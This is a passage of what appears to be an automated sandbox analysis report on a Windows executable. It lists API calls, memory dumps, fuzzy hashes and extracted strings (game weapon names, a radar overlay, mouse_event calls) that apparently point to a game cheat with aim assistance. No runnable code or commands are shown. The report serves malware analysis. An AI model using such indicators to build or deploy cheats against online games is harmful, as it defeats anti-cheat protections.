                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Elite
                                                                                                                                                                                                      • API String ID: 3063020102-374124821
                                                                                                                                                                                                      • Opcode ID: 433a740ac596b3775d7cd27aed4025e363777eca8a87c0d73b1bc22af3f4a7da
                                                                                                                                                                                                      • Instruction ID: 2ee856e36a13197df5a173f21356c2e453e580512a94bdcd8b2ce348f7cbc0d3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 433a740ac596b3775d7cd27aed4025e363777eca8a87c0d73b1bc22af3f4a7da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F882E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Platinum 2
                                                                                                                                                                                                      • API String ID: 3063020102-2901091026
                                                                                                                                                                                                      • Opcode ID: 23b73752a61641d6e1cfc265b77130eb62e62d3bdf11c2ba42d930f9df2cc77e
                                                                                                                                                                                                      • Instruction ID: 7d339716707577c089f77282455411f5349ec7917890aef7d633b8164018d82f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23b73752a61641d6e1cfc265b77130eb62e62d3bdf11c2ba42d930f9df2cc77e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Platinum 1
                                                                                                                                                                                                      • API String ID: 3063020102-904033128
                                                                                                                                                                                                      • Opcode ID: 0de8fe864511a510f1376c65c64b49df295a1d055d671f00c5868a459a86609d
                                                                                                                                                                                                      • Instruction ID: 629676a588688cd8eab72a78afe8d944a656368c27c556a647cf79f2f7020b8a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0de8fe864511a510f1376c65c64b49df295a1d055d671f00c5868a459a86609d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0982E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Diamond 1
                                                                                                                                                                                                      • API String ID: 3063020102-2020049192
                                                                                                                                                                                                      • Opcode ID: 140d053bcd2fbc3d0ce6ff18c15cb116db7409568f4bb662c7ecc0d977282dbf
                                                                                                                                                                                                      • Instruction ID: 43b698c3e181b2f01a93e85a650094e97f2f41d019ab363760d71a2b01930e02
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 140d053bcd2fbc3d0ce6ff18c15cb116db7409568f4bb662c7ecc0d977282dbf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Platinum 3
                                                                                                                                                                                                      • API String ID: 3063020102-3689681476
                                                                                                                                                                                                      • Opcode ID: 7ec2125242782399e3b68455f6c0d1c755060b70530a9672af63ad0da23814b5
                                                                                                                                                                                                      • Instruction ID: 5fd69c66550a89b62f63e138a2e64b4953499d0755629bc720e9eb35e422aaed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ec2125242782399e3b68455f6c0d1c755060b70530a9672af63ad0da23814b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F582E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B2E10: DeviceIoControl.KERNEL32 ref: 00007FF68B4B2ECD
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BE86A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ControlDevice_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
                                                                                                                                                                                                      • API String ID: 4009212252-766504981
                                                                                                                                                                                                      • Opcode ID: 0730dd66f811846eef82fdf937a227102711d08cba7481cd52c056ab4cda209f
                                                                                                                                                                                                      • Instruction ID: a79a96671ff794dc4d1321ac208851368c7d805eb2220c03d8cbc5017e56839e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0730dd66f811846eef82fdf937a227102711d08cba7481cd52c056ab4cda209f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E52C422E18A86C5FB218F7984423BC6350BF9D754F44473ADA6D676FAEF78A581C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StateWindow$Client$AsyncCursorMessageScreen$Rect$ActiveCounterDestroyDispatchForegroundPeekPerformanceQueryTranslatefreerand
                                                                                                                                                                                                      • String ID: ##radar$Hands$Nearby Entities: $Unranked$VUUU$Visible Entities:
                                                                                                                                                                                                      • API String ID: 460599277-1119963227
                                                                                                                                                                                                      • Opcode ID: e9f1ffbf48534ec4e5ef1f142d6b439e782f0104ddf7e0d8599e76680e62f97d
                                                                                                                                                                                                      • Instruction ID: cbbdfbd4ec33c6de8415277b31eb8e9d22575fe986460dc8ceb976e626a0d42e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9f1ffbf48534ec4e5ef1f142d6b439e782f0104ddf7e0d8599e76680e62f97d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1322A36A58A42C6EB20CF25D89567833A1FF9DF84F08453AD90D836BADF3DA449C711
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4293554670-0
                                                                                                                                                                                                      • Opcode ID: 13584466c64051da762a6bc05535db6d7cfca919f33879a3c0286c16851a0640
                                                                                                                                                                                                      • Instruction ID: c229d9b5319b453e8ee10768195010b1d6843d72361f27f6293e87773acdf0ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13584466c64051da762a6bc05535db6d7cfca919f33879a3c0286c16851a0640
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A914231A48E46C6E6648B25A86667522A0BF49FB4F144738DA7E876F8DF3CE50DC700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1B5
                                                                                                                                                                                                      • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1D0
                                                                                                                                                                                                      • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1E9
                                                                                                                                                                                                      • sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF207
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BF307
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CA9F8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF68B492AC0), ref: 00007FF68B4CAA08
                                                                                                                                                                                                      • mouse_event.USER32 ref: 00007FF68B4BF2A9
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E
                                                                                                                                                                                                      • mouse_event.USER32 ref: 00007FF68B4BF2C1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
                                                                                                                                                                                                      • String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
                                                                                                                                                                                                      • API String ID: 2172613484-4283324268
                                                                                                                                                                                                      • Opcode ID: f00969fdb4ff0c3ce3e3af59dfc74dc10e8458fb6e2fc563d7efd804f5d31e57
                                                                                                                                                                                                      • Instruction ID: c490c85eddecac2f0ec2a706cfdf81fefad35c23b08cb44166e726743d85de82
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f00969fdb4ff0c3ce3e3af59dfc74dc10e8458fb6e2fc563d7efd804f5d31e57
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F02E222E14A86C4E720CF35D8422B97360FF9D794F54533AEA5C976BADF78A585C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free$malloc$memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1620901979-0
                                                                                                                                                                                                      • Opcode ID: ceb6fe30e33f1f34d47d6dc1dfc47ae5b6fcf571356623effa51148eb56a66ee
                                                                                                                                                                                                      • Instruction ID: c08aea35b556724a17c326eeb61dab760ea645dbcad00af5dbd4978c949ec365
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb6fe30e33f1f34d47d6dc1dfc47ae5b6fcf571356623effa51148eb56a66ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66B2AF32A04784CAE755CF26D0416AD77B4FF49B88F05923ADE49A37A9DF38E495CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free$mallocmemcpysqrtf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 943526449-0
                                                                                                                                                                                                      • Opcode ID: cb44fdcdf71a0be0250223b21cb3b71f60db58ac696eae73ad42354c0a5d3fc3
                                                                                                                                                                                                      • Instruction ID: 7a5be34d9ebf237a2425f84c175bd57d95f503bbd8b0ed4b8eca7fddc90a28b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44fdcdf71a0be0250223b21cb3b71f60db58ac696eae73ad42354c0a5d3fc3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62727A12E28BE885E3128B36514227AA6D1BF6E784F1DD726ED44E7676EF3CE441C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: cosfsinf$ControlDevice$asinatan2memsettanf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1330759842-0
                                                                                                                                                                                                      • Opcode ID: 21291bbf4ffbfd79faf99a590387d54dc945600902d7cfb14d02a13a3436941a
                                                                                                                                                                                                      • Instruction ID: dad43f55e7ccc944ad85c12ad83eaff45b619faa7720d7df1b960c883b61e452
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21291bbf4ffbfd79faf99a590387d54dc945600902d7cfb14d02a13a3436941a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED1E822D28F8585E2139B3654522BAA354BF6F3D4F199326F94D72677EF38A1C2C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2057792927-0
                                                                                                                                                                                                      • Opcode ID: afb75d6a5a88d81a88b4b35408aecbec497361a3e84a9b1daa9cb3821554377a
                                                                                                                                                                                                      • Instruction ID: 52e8bf99682871c87dce11b592740ff92c28d5b2ce75d6d29f718339a65d2aea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: afb75d6a5a88d81a88b4b35408aecbec497361a3e84a9b1daa9cb3821554377a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF514B21A0A602C2FA649F19E99627962A0FF4CB84F48443DD91EC73BADF3CF585C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fmodffreemallocmemcpystrncpy
                                                                                                                                                                                                      • String ID: #SCROLLY
